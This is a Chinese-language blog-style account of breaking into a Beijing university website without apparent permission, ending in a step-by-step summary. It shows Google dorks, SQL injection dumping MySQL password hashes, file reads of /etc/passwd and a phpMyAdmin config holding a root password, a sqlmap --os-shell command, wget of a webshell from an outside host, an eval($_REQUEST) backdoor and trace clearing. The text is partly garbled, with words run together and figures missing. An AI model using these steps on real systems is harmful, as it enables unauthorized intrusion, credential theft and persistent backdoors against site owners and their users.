友情检测北京某大学网站
0×00信息收集
无意中发现了个注入链接,到底怎么发现的我也不知道,反正不是扫的。
http://www.2cto.com /xxxxxx?id=12
谷歌找到后台
site:f4ck.edu.cninurl:admin
http://www.2cto.com /xxx/xxx.php
0×01账号密码获取
先利用注入点。
丢进Havij跑出数据库
跑出数据库账号密码
如图
破解admin密码失败,如图
然后破解其他的用户,获得密码为123xxxxx登陆后,无可以利用地方,如
查看其他的超级管理员,密码都没有破解成功,其中一个cmd5显示破解成功,但需购买,但
实际是即使购买,它会提示没法破解。我擦。如图
继续。看见mysql
读取账号密码信息,又发现了phpmyadmin
先读取mysql的用户密码信息
Data
Found:
User=xxx
Data
Data
Data
Data
Data
Found:
Found:
Found:
Found:
Found:
Password=*3A3DAA719C86DA543FF1A9E27DB6E59xxxxxxxxx
User=pku_xxx
Password=*3EDC2D4C98204DC580FCE638B8B3FA7xxxxxxxxx
User=root
Password=*EF9C0D7D80D1B158F3958176F869AAC9xxxxxxxx
查root密码时候又是提示购买,要购买时又提示无法解密。Fuck啊。
0×02转战phpmyadmin
后台传shell无望,转战phpmyadmin
在网站后添加phpmyadmin如图
输了几个常用的账号密码没结果。再看看那个读文件的功能
如图,可以读出/etc/passwd文件的内容
如图G-7
之后就是看看能能知道默认的配置文件,依据服务器信息如图G-8,判断是Apache之后填写
默认的安装目录,默认的默认配置文件,
读/etc/issue获得操作系统Ubuntu10.10\n\l
读/usr/local/apache/conf/httpd.conf失败
读/usr/local/apache/conf/httpd.conf失败
工具都提示Iamidle….。
然后就继续打算猜目录了,phpmyadmin爆路径,但都没爆出,这个phpmyadmin貌似有点怪。
然后Google
site:www.2cto.com warning:
site:www.2cto.com error:
也没搞到。然后就是拼人品。
0×03发现xampp
user
听着《第一首情歌》,继续。
忽然看到那个phpmyadmin的登陆界面中有
然后搜索获得xampp默认安装信息如图G-9
xamppuser
如图f的那样。
File/Directory
Purpose
/opt/lampp/bin/
/opt/lampp/htdocs/
/opt/lampp/etc/httpd.con
f/opt/lampp/etc/my.cnf
/opt/lampp/etc/php.ini
/opt/lampp/etc/proftpd.c
onf
/opt/lampp/phpmyadmin/co
nfig.inc.php
TheXAMPPcommandshome./opt/lampp/bin/mysqlcallsfor
exampletheMySQLmonitor.
TheApacheDocumentRootdirectory.
TheApacheconfigurationfile.
TheMySQLconfigurationfile.
ThePHPconfigurationfile.
TheProFTPDconfigurationfile.(since0.9.5)
ThephpMyAdminconfigurationfile.
读文件
读/opt/lampp/phpmyadmin/config.inc.php
获得信息如图G-10
$cfg['Servers'][$i]['user']
=’root’;
$cfg['Servers'][$i]['password']
=’91xxxx’;
不过它的亮点是commentskey啦啦啦。。
果断连接phpmyadmin,然后我擦哇,输入没反应,这个是个啥子情况。
然后继续读文件,看能读到配置文件不。
读/opt/lampp/htdocs/index.php
找到配置文件,
如图G-11
第60页共633页
继续读/opt/lampp/htdocs/inc/conn.php
没密码哇哈哈。
之后可以写一句话木马文件进去,但是pangolin没写入。
Itsaidthetargetmustsetmagic_quotes_gpctooff
执行数据库查询语句
select”intooutfile’/opt/lampp/htdocs/fuck.php’
失败
0×04拿起Sqlmap
然后想起了sqlmap它弹个shell出来。
命令:sqlmap.py-u”http://www.2cto.com /xxx.php?id=12″–os-shell
输入web路径/opt/lampp/htdocs/之后弹出的shell,如图G-12
查看whoami
如图G-13
lscat命令可以执行cdvi等命令都没法执行
列目录时输入ls/则命令成功
之后发现可以利用wget命令,但是很明显弱智了,直接wgethttp://fuck.uk/a.php额。。
然后直接wget
Cata.txt
结果为
http://fuck.uk/a.txt
之后,发现没法重命名,试了下,wget个rar文件,然后解压也不行。额。。其实cp
可以执行的,直接cpa.txta.php就成功啦。菜刀连接,失败。。Fuck。。。。
之后看了下一句话
而如果php设置文件中的
和mv是
short_open_tag是open的话才可以使用
重新wget之后如图
G-14
?>
所以最好用
eval($_request[fuck])?>
菜刀连接如图G-15
Ok….提权啥子的先不搞了。
0×05敏感信息收集
搜索各种账号密码信息,清理痕迹
suggestion
no suggestion
—————————————————————————————————————
本次实战渗透总结经验:
1.用扫描SQL注入工具找到了注入点:http://f4ck.edu.cn /xxxxxx?id=12
2.site:f4ck.edu.cn inurl:admin //用GOOGLE语法找到网站后台
3.把注入点放到havj里面跑跑,跑出了几个密码,试了几个密码都没用
4.再看看PHPmysql数据库配置信息,看到了用户名和密码(MD5加密了的)结果都没破解出来;
5.放到stuctr2工具中的文件读取中输入:/etc/passwd //查看各种密码以及得到服务器的各种路径信息
6./etc/issue (读取服务器信息)/usr/local/apache/conf/httpd.con 查看apche服务器的配置
7.用goole黑客语句:site:f4ck.edu.cn warning: site:f4ck.edu.cn error:
8.用sqlmap语句:sqlmap.py-u”http://f4ck.edu.cn /xxx.php?id=12″–os-shell //sqlmap中弹出SHELL反弹